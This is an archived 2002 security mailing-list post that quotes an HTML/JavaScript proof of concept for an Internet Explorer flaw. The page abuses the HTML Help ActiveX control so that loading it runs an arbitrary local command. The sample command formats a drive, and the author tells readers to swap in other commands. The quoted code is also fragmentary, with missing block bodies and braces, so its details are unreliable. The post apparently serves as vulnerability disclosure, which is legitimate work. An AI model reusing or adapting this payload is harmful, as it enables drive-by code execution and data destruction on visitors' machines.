Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: Gossi The Dog (gossi_at_lab6.com)
Date: Thu Nov 14 2002 - 05:35:10 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    FYI, the HTML code is;



    <script LANGUAGE="JavaScript">

    prog = 'command';
    args = '/k format a: /autotest';

    if (!location.hash) {
    else if (location.hash == "#1")
    else {
      f = opener.location.assign;
    function run() {
      f("javascript:document.write('<object id=c1 classid=clsid:adb"+
       "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
       "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
       "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
       "-00aa003b7a11><param name=Command value=Close></object>')");
    <h1>Testing IE Execute Exploit</h1>


    Change 'args' to a different command (/autotest doesn't work well on
    Windows 2000, for example).

    Oh dear.